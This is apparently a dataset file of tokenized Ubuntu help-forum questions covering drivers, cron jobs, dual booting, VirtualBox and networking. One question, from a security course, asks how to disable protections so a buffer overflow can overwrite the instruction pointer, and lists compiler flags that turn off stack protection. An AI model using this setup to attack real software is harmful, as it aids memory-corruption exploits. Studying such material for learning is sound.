403574	firefox stuck opening rar files as videos	when i try to open downloaded rar files , firefox attempts to handle it like a video by default . choosing `` other '' option and heading to /usr/bin/file-roller is n't a permanent solution .
403576	change sound juicer 's cd database	i like sound juicer for ripping cds , but the cd-database of music brainz is very scrappy compared to freedb.org . i wanted to change the source of the database but unfortunately i did n't find any config-file . is there any way to change it or not ?
403580	ubuntu 13.10 doesnt detect my nvidia 635m on my laptop	i dont see any other hardware detected in my additional drivers section but my wifi adaptor.in only detects my intel hd 4000 video card and not my nvidia one how can i fix that ?
403586	how to determine the architecture of an installation or live cd/dvd ?	how can i determine which architecture ( x86 or x64 ) my ubuntu installation medium is for ? i do n't have it installed , i just need to know which files on the installation media i can use to determine the architecture .
403588	how can i get mysqldump to use the credentials from mysql_config_editor in a crontab-executed script ?	i am setting up a daily backup of a mysql 5.6.14 database using mysqldump on an ubuntu 12.04 precise server . i created the credentials file in the root home directory ( .mylogin.cnf ) according to the instructions for mysql_config_editor . i then created a shell script to perform the backup : # ! /bin/bash echo `` $ ( date + ' % y % m % d % k % m % s ' ) : starting daily backup . '' > > /path/to/backup/dump.log /opt/mysql/server-5.6/bin/mysqldump -- login-path=localroot -- databases mydatabase -- single-transaction > /path/to/backup/daily.sql 2 > > /path/to/backup/dump.log echo `` $ ( date + ' % y % m % d % k % m % s ' ) : finished daily backup . '' > > /path/to/backup/dump.log ( the script has been chmod 755 . ) if i execute this script as root , it works as expected . i created a crontab entry in the root 's crontab using sudo crontab -e : # m h dom mon dow command 15 0 * * * /home/username/mysqldump-daily the problem is that the output log ( dump.log ) shows that the script tried to use incorrect credentials : mysqldump : got error : 1045 : access denied for user 'root ' @ 'localhost ' ( using password : no ) when trying to connect suffice to say , my root user is not named 'root ' so i know that it is not using the credentials stored in the .mylogin.cnf file , nor is it using the actual root user account . i 'm not sure why this is happening , but i suspect it has something to do with cron not being given access to the root user home path , or that it 's executing the script as a different user . i thought editing the root 's crontab ( rather than putting the script into /etc/cron.daily/ for example , which i 've tried ) would work . i do n't want to include the password in the script for obvious reasons , which is why i am trying to employ the encrypted file . how can i get the cron-executed script to successfully utilize the credentials i 'm specifying ?
403590	wacom intuos cth480 ubuntu 12.04	i got a brand new wacom intuos cth480 the other day , did some research and found out how to get the drivers but when i do ./config at the end i get this build environment : linux kernel - yes kernel source - no we could not find the kernel development environment to build the driver . please install the kernel source or the kernel development package and try again . user @ chrubuntu : ~/desktop/input-wacom-0.20.0 $ i really want to get this working i tried installing kernel but nothing worked . if you can please respond very specific on how to get it to work as i 'm not 100 % familiar with ubuntu like this ? so this is what you want me to do
403591	amd-v is being used by another hypervisor . ( verr_svm_in_use )	when i try to open any os on oracle virtualbox an error accurate . failed to open a session for the virtual machine xp efendi . amd-v is being used by another hypervisor . ( verr_svm_in_use ) . virtualbox ca n't enable the amd-v extension . please disable the kvm kernel extension , recompile your kernel and reboot ( verr_svm_in_use ) . how can i repair this problem ?
403594	crontab doesnt upload file via ftp script	i write script that make a zip file with /var/www directory and mysqldump db and upload it via ftp and change mode to executable file and put it in cron tab but file does n't upload ! ! ! # ! /bin/bash mysqldump -u root -h localhost -p123456 -- all-databases > /tmp/test/databases.sql tar cfz /tmp/test/databases.sql /var/www /tmp/test/zip.tar.tgz ftp -n < < eof open $ server user $ user $ password put /tmp/test/zip.tar.tgz eof put it in crontab ./script.sh but when crontab has been worked , just the zip file was created and it does n't uploaded
403595	ubuntu 13.10 ca n't see my wifi	i 'm trying out ubuntu 13.10 from a live dvd . it does not detect my wifi or any other wifi that my windows 8 always shows . i typed lspci -v in terminal and here 's what it says : network controller : broadcom corp bcm43142 802-11b/g/n ( rev 01 ) subsystem : dell wireless 1704 802.11n + bt 4.0 kernel driver in use : bcma-pci-bridge pci bridge : intel corporation 7 series/c210 series chipset family pci
403597	problems re-establishing wireless connection after messing with ndiswrapper/modules	my wireless connection speed only crawled , but when connected , very fast . with the help of a community member , i thought i had it fixed by installing ndiswrapper , downloading .inf driver file ( windows driver for my computer ) , and various other tweaks which i had no business attempting on my own after i thought it was fixed . long story short , i messed up and can not find any networks , wireless seems gone altogether , and wlan0 does not appear . on shutdown , i also notice a flash of firmware missing , or something like that . am not sure what all i should provide , so if any other pastes would be of help i will provide them . http : //pastebin.com/wllf7fpe details : os ubuntu 13.10 memory 5.3 gib processor amd a6-3400m apu with radeon ( tm ) hd graphics ă 4 gallium 0.4 on amd sumo os type 64-bit disk 732.5 gb
403599	can /mnt be safely excluded from system backup ? what is bootinfo and boot-sav ?	i would normally think to exclude /mnt from a system backup then simply remake the empty dir on restoring the system , should the need arise , with mkdir /mnt . i 'm curious however at the directory structure found inside : ls ** bootinfo : sdb1 sdb3 sdb4 sdb5 boot-sav : sdb1 sdb4 all these directories ( mount points ) are empty . what is their purpose ? do i need to back them up , or can i just re-create them on system restore , or rather will ubuntu just recreate them for me if i simply recreate /mnt ? what creates them in the first instance ?
403602	virtualbox usb problem with windows 7 ( 64-bit ) guest	i 'm running virtualbox 4.2.16_ubuntu r86992 on ubuntu 13.10 host . the guest os is windows 7 ( 64-bit ) . i have enabled usb controller and found the host usb devices ( hard drive and memory stick ) . i have also added my username to the vboxusers group ( and rebooted ) . however , the guest os windows 7 does n't see the devices . windows 7 could not install device driver software when i attempted to fix the hardware . i have also tried to install the extension pack but there seems to be no compatible version for 4.2.16 .
403604	will updates and security updates update my ubuntu version ?	when logging into my vps , it says there are some updates and security updates , however ; because i 'm not that into ubuntu programming , i prefer staying onto 12.04 lts . therefor i was wondering : do updates change my ubuntu version to 13.x or any other version or will i stay on 12.04 , until i manually update ? just like windows , i could think that it would only change the third , hidden digest of the ubuntu , as , e.g . i 'm currently on 12.04.120 and after the update , i will be onto 12.04.385 just to be sure.. : ) - please clarify , thanks !
403606	errors with sudo apt-get update	whenever i type in sudo apt-get update in a terminal , these are the errors i receive : ign http : //se.archive.ubuntu.com saucy/main translation-en_us ign http : //se.archive.ubuntu.com saucy/multiverse translation-en_us ign http : //se.archive.ubuntu.com saucy/restricted translation-en_us ign http : //se.archive.ubuntu.com saucy/universe translation-en_us ign http : //se.archive.ubuntu.com saucy-updates/main translation-en_us ign http : //se.archive.ubuntu.com saucy-updates/multiverse translation-en_us ign http : //se.archive.ubuntu.com saucy-updates/restricted translation-en_us get:11 http : //security.ubuntu.com saucy-security/main i386 packages [ 63,4 kb ] ign http : //se.archive.ubuntu.com saucy-updates/universe translation-en_us ign http : //se.archive.ubuntu.com saucy-backports/main translation-en_us ign http : //se.archive.ubuntu.com saucy-backports/multiverse translation-en_us ign http : //se.archive.ubuntu.com saucy-backports/restricted translation-en_us ign http : //se.archive.ubuntu.com saucy-backports/universe translation-en_us get:12 http : //security.ubuntu.com saucy-security/restricted i386 packages [ 14 b ] get:13 http : //security.ubuntu.com saucy-security/universe i386 packages [ 24,4 kb ] get:14 http : //security.ubuntu.com saucy-security/multiverse i386 packages [ 1 388 b ] err http : //ppa.launchpad.net saucy/main amd64 packages 404 not found err http : //ppa.launchpad.net saucy/main i386 packages 404 not found ign http : //ppa.launchpad.net saucy/main translation-en_us ign http : //ppa.launchpad.net saucy/main translation-en err http : //ppa.launchpad.net saucy/main amd64 packages 404 not found hit http : //security.ubuntu.com saucy-security/main translation-en err http : //ppa.launchpad.net saucy/main i386 packages 404 not found ign http : //ppa.launchpad.net saucy/main translation-en_us ign http : //ppa.launchpad.net saucy/main translation-en err http : //ppa.launchpad.net saucy/main amd64 packages 404 not found err http : //ppa.launchpad.net saucy/main i386 packages 404 not found ign http : //ppa.launchpad.net saucy/main translation-en_us hit http : //security.ubuntu.com saucy-security/multiverse translation-en ign http : //ppa.launchpad.net saucy/main translation-en hit http : //security.ubuntu.com saucy-security/restricted translation-en hit http : //security.ubuntu.com saucy-security/universe translation-en ign http : //security.ubuntu.com saucy-security/main translation-en_us ign http : //security.ubuntu.com saucy-security/multiverse translation-en_us ign http : //security.ubuntu.com saucy-security/restricted translation-en_us ign http : //security.ubuntu.com saucy-security/universe translation-en_us fetched 259 kb in 5s ( 48,9 kb/s ) w : failed to fetch cdrom : //ubuntu 13.10 _saucy salamander_ - release amd64 ( 20131016.1 ) /dists/saucy/main/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 13.10 _saucy salamander_ - release amd64 ( 20131016.1 ) /dists/saucy/restricted/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 13.10 _saucy salamander_ - release amd64 ( 20131016.1 ) /dists/saucy/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 13.10 _saucy salamander_ - release amd64 ( 20131016.1 ) /dists/saucy/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch http : //ppa.launchpad.net/revl/codimension/ubuntu/dists/saucy/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/revl/codimension/ubuntu/dists/saucy/main/binary-i386/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/upubuntu-com/tor/ubuntu/dists/saucy/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/upubuntu-com/tor/ubuntu/dists/saucy/main/binary-i386/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/upubuntu-com/tor64/ubuntu/dists/saucy/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/upubuntu-com/tor64/ubuntu/dists/saucy/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . what does this mean ? i appreciate any and all help ! : ) i run ubuntu 13.10 , i recently installed it and am overall quite happy with it .
403608	particular wifi not detected in ubuntu 12.04 - dell vostro 3560	i am using a dell vostro 3560 with win 7 x64 and ubuntu 12.04 as dual boot . earlier my room wifi was getting detected in both ubuntu and windows 7 . but recently i moved to a different location ( country ) and the wifi in the hostel does n't seem to be detected by ubuntu , although i can connect it from win 7 and it works fine in windows . ubuntu shows a lot of other wifi connections ( available in that range ) ; but would n't show the wifi i need to connect to . i have tried connecting using the hidden network option , but it does n't work either . can someone please help me on this ? output of lshw -c network : *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 07 serial : f0:1f : af:0d:08 : ba size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl8168e-3_0.0.4 03/27/12 latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:41 ioport:3000 ( size=256 ) memory : c2404000-c2404fff memory : c2400000-c2403fff *-network description : wireless interface product : bcm43142 802.11b/g/n vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth1 version : 01 serial : f8:2f : a8 : bf:0e : e1 width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.20.155.1 ( r326264 ) ip=192.168.1.120 latency=0 multicast=yes wireless=ieee 802.11abg resources : irq:17 memory : c2500000-c2507fff also , i found out that its a comtrend 802.11n gigabit router . any help ?
403612	problems loading ubuntu 13.10 desktop - problemas al cargar escritorio de ubuntu 13.10	original question ( in spanish ) : despues de instalar ubuntu 13.10 en mi pc y iniciar mi sesi贸n no se carga el escritorio , de hecho la pantalla queda en negro ? ? ? ? ? ? mi pc tienen 2.5 en ram e intale ubuntu 64bits after installing ubuntu 13.10 on my pc and start my session does not load the desktop , in fact , the screen goes black ? ? ? have 2.5 on my pc ram and 64bit ubuntu intale
403613	disabled my built in laptop camera , but it re-enables after reboot	i 'm on 12.04lts . i have an external usb hd cam that i run as default ( preferably ) . to do this , after every reboot i have to run sudo su -c 'echo `` 0 '' > /sys/bus/usb/devices/1-1.4/bconfigurationvalue' ( 1-1.4 is my laptop cam ) this disables my laptop cam . then in guvcview i get : which is easily fixed by simply unplugging , and plugging the external cam 's usb into port . then my external cam works great , and is my default selection , and the only one listed in devices under guvcview , and is marked as default in multimedia selector . everytime i reboot ubuntu , i have to go through this little process . not a terrible problem , but is there a way to make my 1-1.4 value stay at `` 0 '' ? edit : edit 2 : open terminal cd /etc sudo nano rc.local edit file by placing command before `` exit 0 '' press ctrl - x y to save ! /bin/sh -e # # rc.local # # this script is executed at the end of each multiuser runlevel . # make sure that the script will `` exit 0 '' on success or any other # value on error . # # in order to enable or disable this script just change the execution # bits . # # by default this script does nothing . echo `` 0 '' > /sys/bus/usb/devices/1-1.4/bconfigurationvalue exit 0
403616	`` ntpd unable to bind to wildcard address 0.0.0.0 - another process may be running ''	on my ubuntu 13.04 ( using aws ) . when i start a new machine or when i reboot my machine ntp does not start and i see the following in the syslog : jan 10 02:56:49 ntpd : unable to bind to wildcard address 0.0.0.0 - another process may be running - exiting i also notice that before this ntpdate was used to adjust time jan 10 02:45:20 ntpdate [ 960 ] : adjust time server offset -0.000259 sec i am not sure if this is a race condition or me missing something here , i would appreciate if anyone can help me out here . thanks
403618	how do i `` clean up '' a machine after using the local provider ?	i 'm doing some testing and sometimes i have issues with containers and juju . how do i clean up a machine so that i can start using the local provider `` from scratch '' without reinstalling ?
403620	lts 12.04 ftbfs without default-jre : `` you must specify a valid java_home or javacmd ! ''	i 'm on 12.04 lts , trying to rebuild some java packages ( e.g . groovy ) to avoid depending on java6 . i 've apt-get source groovy , and change the package depends : line to allow openjdk-7-jre-headless ( and build-depends to allow openjdk-7-jdk ) . i have no java6 on my system debuild -s ... dh_testroot you must specify a valid java_home or javacmd ! how do i ensure smooth building and installation ( preferably in a ppa as well ) ? is the debian transition from java6 to java7 documented anywhere ? alternatively , are there any venues to contact debian java devs ?
403623	ubuntu 12.04 in win 8.1 hyper-v vm wo n't reach internet	i have a surface pro 2 . i was able to successfully create a virtual machine on hyper-v and install ubuntu 12.04 lts 64bit in it . that was fine . however , i ca n't an internet connection through ubuntu . of course , the wireless connection works perfectly on windows 8.1 on the surface pro . i have already created an external virtual switch on hyper-v manager that is 'bound ' to the marvell avastar 350n wireless network controller of the surface pro 2 . after that i added that virtual switch to the virtual machine that has ubuntu . however when i start ubuntu on the virtual machine , it ca n't connect to the internet . note : when i create the virtual switch on hyper-v manager and i go to `` network and sharing center '' i can see the virtual switch but it says `` no internet access '' . now i have no idea how to fix this . i would appreciate any help since i need to run ubuntu for my programming 3 class . cat /etc/network/interfaces shows : auto lo iface lo inet loopback
403628	how can i export a .ui file for a pygi window that i build dynamically ?	i understand that building things with the mvc mindset is a good thing . i also understand that if you separate code maintenance and ui , that glade ui files make it easier for non-programming people to offer ui improvements . the question is this : i 'm better at generating the widgets i need dynamically from code . how can i generate ui files from some dynamically generated window ? ex : assuming main_win is an instance of the window for which i want a ui file , is there a way to do gtk.builder.generate_ui ( main_win ) or something similar ? i looked at the builder documentation and i know that no similar functions exist there , but how can i do something like this ?
403630	is it possible to run an opengl program via a daemon ?	my main question is : is it possible to run an opengl program via a daemon ( upstart script ) ? the program displays a window on the screen . more details : i have an opengl program ( done with openframeworks , c++ ) that i want to run with a daemon . manually i start my program in the terminal like this : planeviz @ planeviz : ~/src/of/apps/myapps/planeetoiles/bin $ ./planeetoiles now i created an upstart script ( /etc/init/myapp.conf ) , that should start the program when the computer boots , and make sure to restart it in case of crashes . # job file description `` myapp '' author `` eva '' # when to start the service start on startup start on runlevel [ 2345 ] # when to stop the service stop on runlevel [ 016 ] # automatically restart process if crashed respawn # start the process script sudo /home/planeviz/src/of/apps/myapps/planeetoiles/bin/planeetoiles end script then i try to start the daemon via sudo service myapp start my application does n't open . dmesg tell me : planeviz @ planeviz : /etc/init $ dmesg | grep `` init : '' [ 5282.003496 ] init : myapp main process ( 8008 ) terminated with status 139 termination status 139 seems to hint at a segmentation fault . looking at the output of my program in the upstart log , i see the last error to be related to the creation of the opengl window . planeviz @ planeviz : /etc/init $ sudo tail /var/log/upstart/planeetoiles.log ... . [ error ] ofappglfwwindow : could n't init glfw this makes me wonder if its even possible to run opengl programs with upstart , or if it is only meant to work with background processes ?
403634	âdlltool , makensis â command not found	whenever i 'm installing a software on my machine it is showing /bin/bash : dlltool : command not found /bin/bash : makensis command not found my operating system is ubuntu 12.04 . do i need install any packages on it . ?
403638	is it possible to install ubuntu tv in a vm	i was wondering if it was possible to install ubuntu tv in a vm . if it is possible , then please answer and give me the details . thank you !
403639	kickstarter crowd source funding and pitivi	i have a video , generated in pitivi and can not understand what to do with the rendering to make this video work on kickstarter ( ks ) . they say : `` for video encoding , use wmv format in windows . on mac , use h.264 . '' how do i get the pitivi rendering engine to make a .mov ? there is no such option in the rendering selections . the default formats of pitivi do n't mention .mov or h.264 . they do have a h.263 . i 'm using ubuntu 12.04 lts.pitivi 0.15.2 .
403640	desktop file in ubuntu does not execute command	i just installed tor , privoxy and proxychains on ubuntu 13.10 , but they are not experiencing any problems . my problem is based on a .desktop file i created as i think it actually does n't work properly . the content of that file is : [ desktop entry ] type=application terminal=false name=switch ip address icon=/usr/desktop/icons/switchip.png exec=service tor restart as command service tor restart is used to obtain new fake ip address , but when i run it from a terminal , it works . when i click on icon on launcher ( which is .desktop file above ) it does not take any effect . what i missed or did wrong ?
403649	login window in ubuntu does not get black after some time	i have ubuntu 13.10 running . when i log-out from the machine , the screen does not get black or it does not show any screen-saver . what could be the issue ?
403650	no audio , fresh install , ubuntu 13.10	toshiba s55d-a5383 laptop did fresh install with ubuntu 13.10 . get no audio output from any source . test play buttons appear to function but no audio . really need some help with this , getting ready to do something like go back to windows
403653	samba error message invoke-rc.d : initscript samba , action `` restart '' failed	hello i 'm on ubuntu 13.10 x64 newbies i try to create a samba share . it is installed , and i think it is running , i create users and a shared folder on a secondary internal hard drive sata automatically mounted at startup . the trouble is that as soon as i created my shared folder with the `` system-comfig-samba '' command when clicked on create this error in the terminal '' invoke-rc.d : initscript samba , action , '' restart `` failed . '' it appears has all my manipulations in the samba configuration manager cited above and if i go to my pc running ubuntu from windows i see my folder but i can not access it . win7 diagnostics wonder my internet connection . but i go to another shared samba folder by default . if it is shared by samba . i can give more info if you told me how to proceed . thank you for your help ... michael
403658	ubuntu crashing	i have a really annoying dell xps m1330 that keeps crashing . i am using ubuntu 13.10 , and i think that i have 4 gb of ram , maybe less . ( i got this about 2 years ago ) , and the thing worked just fine on opensuse , 12.10 , and for a while , it worked on 13.10 . after a while , it kept on rebooting itself , when i was playing minecraft , or other things , such as pressing the [ super ] key . are there any ways to solve this ? ( or am i just being stupid and needing to go back to 12.10 ? ) thank you !
403659	how to install new graphic driver for nvidia gt 540m and optimus driver	i have an aspire 5750g with an nvidia gt 540 m i do n't know how to install the driver for the card and the driver for the nvidia 's optimus technology can you help me ? ? i 'm new with ubuntu thanks for all that will answers : )
403662	ssd use cases / windows-ubuntu dual boot with uefi	i got a asus s550 cm ultrabook with windows 8 pre installed , 24 gb ssd , 750 gb hdd and am looking at uefi for the first time . i am a web developer and would only be using a few ides , my sql and a dozen scripting languages for not very intensive development / financial modelling . i need to install ubuntu on my laptop but before i even get to creating a partition to install ubuntu on , there are some partitions on my hdd ( as shipped with the ultrabook ) that have me in a fix.not sure why these are 100 % unused and what i need to do before i go about creating any partitions on my hdd . ( link to disk management screen shot - https : //drive.google.com/file/d/0b6gk3wcwvu3xstvpwxvfdmpqzg8/edit ? usp=sharing ) ssd : i looked at disk management and the ssd contains an oem partition ( 4 gb ) and a primary partition 18.36 gb . ( totals 22.36 gb , balance unexplained , both 100 % unoccupied ) from the looks of disk management , windows seems to be installed on the hdd . 1 ) how exactly am i supposed to use the ssd ? what should the ssd contain ? the operating systems i need or files/programs i expect to use most frequently . 2 ) correct me if i am wrong , the ssds help ultrabooks boot quickly as compared to booting from hdds , right . how is the ssd being used that boots windows 8 in 6 seconds ? why is windows 8 not on the ssd and why is the ssd empty ? 3 ) is the ssd supposed to be accessed like any other drive from my computer . it does not appear in my computer and does not seem to have a file system or drive letter associated with it . 4 ) i do n't really know what an ssd is used for except that its storage that can be read by the processor at very high speeds compared to an hdd . there is no phenomenal use i can make of 24 gb irrespective of how fast i can read from it . can some 1 guide me on ssd use cases . efi system partion : the difference between efi and legacy bios is a quite over my head . this is 300 mb in size and is 100 % free . what data is supposed to go here ? windows does boot in efi mode , as verified from msinfo32 . i do understand that some files that are required to load the os in efi mode go here and a different set of files are required for each os . but why is this 100 % unoccupied in the present case . are n't the requisite windows files supposed to be here . these questions to begin with , there will be more when i read up on the actually installation procedure for windows 8 plus ubuntu dual boot . phew ! !
403664	how to disable pointer obfuscation on 12.04	i am working on a security project for school and need to overflow a buffer , i therefore need to overwrite the eip , but for some reason i ca n't . the a 's that i overwrite the buffer with are spread all over the address space . i am assuming that the pointer obfuscation feature in ubuntu is enabled . is there a way to disable this . i have the following command to compile my program . gcc -ggdb -fno-stack-protector -z execstack -o overflow overflow.c i also have the aslr disabled . my code is a simple strcpy ( buffer [ 10 ] , argv [ 1 ] ) , and a print statement . it should ideally crash when it gets the input of 24 as . any help will be greatly appreciated . regards , aditya .
403666	after installing linux , preinstalled windows 8 is not in boot entry	i have installed linux mint beside to preinstalled windows 8 . after the installation , in grub2 menu there is no windows 8 entry . also the partitions are not shown.. the tool boot-repair dont help me.. here is the boot-repair report : http : //paste.ubuntu.com/6729336/ how can i fix this ? thank you in advance
403667	( two part ) do i need a bootable usb to install ubuntu 13.10 on a os-less computer ? and if i do , how do i create one on my mac ?	i 'm fairly sure i need a bootable usb for my new self built computer , but i 'm not 100 certain , so i 'm asking . and as for how to make a bootable usb , i have a usb in fat 32 format , and i got stuck on step 3 of the tutorial . after about 2 hours of trying this and looking at other threads , i do n't understand any of it . untill today i had never even opened the terminal on any computer ever so being specific and showing me key-for-key would be very advisable . thanks for the help , i 'm really bad at this .
403669	running a vm on sd card	i recently bought a ssd , and i 'm wondering if running a windows virtual machine will do a lot of writing or it 's mainly reads ? i thought using a 32g sd card ( sandisk extreme plus 80m/s read and 60m/s write ) to run the vm without wearing out the ssd . since my card reader is on pci , it should perform just as if it was installed on a hdd ( 60m/s write ) , right ? also i 'm thinking on setting a swap partition on sd card since i did not set a swap partition on ssd , is that advised ? thanks in advance .
403676	how do i export saved passwords from my firefox password manager ?	i want to export my saved passwords in firefox/mozilla manager to an external password manager application with better encryption . where is the password file located and what is the file extension ? maybe the application can do an import of the database file .
403678	start byobu setup with server reboot	i would like to start my byobu setup at a server reboot . with screen i use the rc.local and do it like this : su user -c 'screen -dms screenname sh /home/user/start.sh' now i would like to know how i do this with byobu that the screens are in the right order and have a custom name i give them . i know there is already this post , but it doesnâ´t answer my question and i couldnâ´t find a solution by googleing it : how do i get a byobu session with a command to run on startup ?
403682	how can i get lightscribe software in ubuntu 13.10 64-bit	i went to lightscribe 's download site and clicked on linux ( i assumed the software would work with foreign arcitecture support ) and went to lightscribe system software and downloaded the deb . the software center said 'the package is of bad quality ' . i really do not know what to do now , can amyone help me ?
403687	how to restrict access to a public web subdirectory	2 questions : how can i restrict access to a subdirectory in 'var/www ' in the 'apache2.conf ' ( not htaccess as i normally would ) ? if i restrict access to /var/www/test and then use 'require ( '/var/www/test/index.php ' ) , will i still be able to load the page as its a server side request ? thanks
403692	dual boot ubuntu and windows 8 - no operating system found	i am struggling to finalize my attempt to run ubuntu 13.10 alongside windows 8 on my new sony vaio pro . after long hours of research i feel i am stuck . i was booting from a usb , let me outline what i did ( apologies if it 's too detailed ) before the installation : deactivated secure boot stayed in uefi boot mode deactivated fast startup initially , when i booted from the usb ( in the efi mode ) , i got a kernel error right away . then i : pressed e to enter grub after booting added in grub libata.force=noncq at the end of the line starting with linux . this solved the problem and the installer could run . ( apparently it has something to do with the ssd . ) during the installation i created three partitions , all of them as logical partitions , the first two as ext4 . ⠀/root ( 10gb ) ⠀/home ( 40gb ) ⠀swap ( 2gb ) i know i should avoid having two /boot/efi partitions , so i just left the windows 8 one as it was . the installation finished successfully . afterwards , the computer would boot into windows 8 straight away . i used the live usb to install boot repair and followed the instructions given by community/boot-repair once running boot repair , the pop-up window said there were winefi files detected , and asked me whether i would like to proceed via changing them or not . during the first trial , i said `` yes '' . the link produced was : ttp : //paste.ubuntu.com//6726194 . after that even windows 8 stopped booting , and the error is that no operating system was found . as suggested by the boot repair program itself , i went through the procedure again , and this time i pressed `` no '' when prompted about the winefi files . the link produced was : http : //paste.ubuntu.com//6726299 . unfortunately , again it did n't help and i ca n't boot either of the operating systems . the computer either suggests recovery for windows or entering bios . i tried changing the booting options to legacy from uefi , but this did n't help . i would be really grateful for any hints .
403701	/etc/crypttab ignored on boot	i wanted to setup encryption with dm-crypt and luks , but i set it up manually , not during installation process ( i created luks partition and /etc/crypttab file properly ) . but the encrypted partition defined in /etc/crypttab does n't mount at boot at all . otherwise , when mounted manually , everything works . it was a clean ubuntu 13.10 install .
403703	music metadata missing	i recently installed ubuntu , as well as banshee . i have a sony walkman nwz-e384 which i have been using , and for some reason when i transfer music files , they are all listed as `` unknown artist '' on the walkman and will only show the file title , but not the actual artist , album , or song names . these are legally purchased albums i have been ripping to my music library . when using windows my files will be listed properly on the walkman under `` artist , album , song '' on the walkman . any solutions or advice would be greatly appreciated . thanks for your time
403705	how do i get thunderbird and ubuntu ( wubi ) and windows to share a profile ?	i have a friend who is running xubuntu 12.04 through wubi . they have thunderbird installed in both xubuntu and windows and a single imap account set up in both ( same imap account ) . the problem is that the email provider only allows 20mb of storage . so the user need to get the message off of the imap server and into a local folder . however , he wants to be able to have access to those local folders in both windows and xubuntu . i 'm sure there 's away for thunderbird to share access to these folders but i 'm not sure how . do i just need to set his local folders in ubuntu to point to the folder in windows or is it more complicated ? thanks
403719	how can i set phpmyadmin to be accessed via tunnelling only ?	i want to improve server security and make phpmyadmin only accessible via a tunnel , as bitnami do in their server config : http : //wiki.bitnami.com/components/phpmyadmin_and_phppgadmin how is this done ? my first thought was to set a directory restriction in apache.conf : < directory `` /usr/share/phpmyadmin '' > allow from 192.168.0.0/24 deny from all < /directory > but i still get access denied when i create a tunnel . am i using the wrong allow from config ?
403723	dropbox no longer works under ubuntu 13.10	i use ubuntu 13.10 and since yesterday my dropbox client no longer works . a reinstallation ( from software center ) did not help . after every ubuntu startup the client requests my admin password , but nothing happens .
403725	unable to complete installating ubuntu within virtualbox	i have a brand new install of ubuntu 12.04.3 on a laptop and then installed virtualbox from ubuntu software center . i want to do testing within virtualbox but ca n't finish the install . first install was using all default values . then i changed it to the following : virtualbox base memory : 512mb virtualbox video memory : 64mb acceleration : 3d i ran the install twice already and it stops at the same point . the status shows `` copying files '' and it stops about 70 % of the `` where are you ? '' map screen . using same iso for virtualbox install as the one i used for the laptop . help !
403726	add my password as part of the script or argument ?	============== # shell script sudo ls ============== when i execute it , script asks for the password . i would like to add my password as part of the script or argument . how can i do it ?
403727	evince printing problem	i have a fresh install of ubuuntu 13.10 and have been having problems printing pdf files from evince . many files ( not all , but the vast majority of them ) wo n't print correctly from evince . i can often print the files with okular . i have an hp laserjet 2200 dtn network printer using a standard ( recommended ) postscript driver . the problem seems to be evince . i usually get a blank page and then a few courier lines beginning with `` offending command : blah , blah '' i notice that many people seem to have this problem but i have not been able to find a solution . it seems to me that somehow i must have something misconfigured because evince is the standard pdf viewer for ubuntu 13.10 . any suggestions ?
403733	keyboard typing input not detected , but keyboard shortcuts work ?	keyboard input is n't recognised properly for some reason ... e.g . : i can launch a terminal with ctrl+shift+t ; but ca n't type in it . i can use keyboard shortcuts in firefox , but ca n't type anywhere . how to fix ?
403734	what 're the main differences between lts and the new release ?	am i able to upgrade 13.10 to the lts version of 64-bit or no ? what are the other main differences or where would i find documentation on them ?
403739	canon imageclass d420	i am trying to install linux driver supplied by canon for my image class d420 canon told me that they only support windows and mac and yet on their website they have a driver for linux i downloaded the driver but i dont know how to make it work could someone hlep me the version i am working with is ubuntu 13.10 thank you
403742	wireless is disabled by hardware switch after connecting to ethernet	i 'm using dell with ubuntu 12.04 . as soon as i connect ethernet , wireless gets disabled and network manager shows wireless is disabled by hardware switch and , that status will go away after i unplug ethernet cable . this is my rfkill list before connecting to ethernet . 1 : phy0 : wireless lan soft blocked : no hard blocked : no 2 : hci0 : bluetooth soft blocked : no hard blocked : no and this one is my rfkill list after connecting to ethernet . 1 : phy0 : wireless lan soft blocked : no hard blocked : yes 2 : hci0 : bluetooth soft blocked : no hard blocked : no lspci result for controllers : ethernet controller : intel corporation 82579lm gigabit network connection ( rev 04 ) network controller : intel corporation centrino advanced-n 6205 [ taylor peak ] ( rev 34 ) i 'm trying to create a hotspot with ethernet ( which worked perfectly well with ppp0 ) and i could n't do that with current problem : siocsifflags : operation not possible due to rf-kill what do i need to do , to solve that `` hardware switch '' problem ?
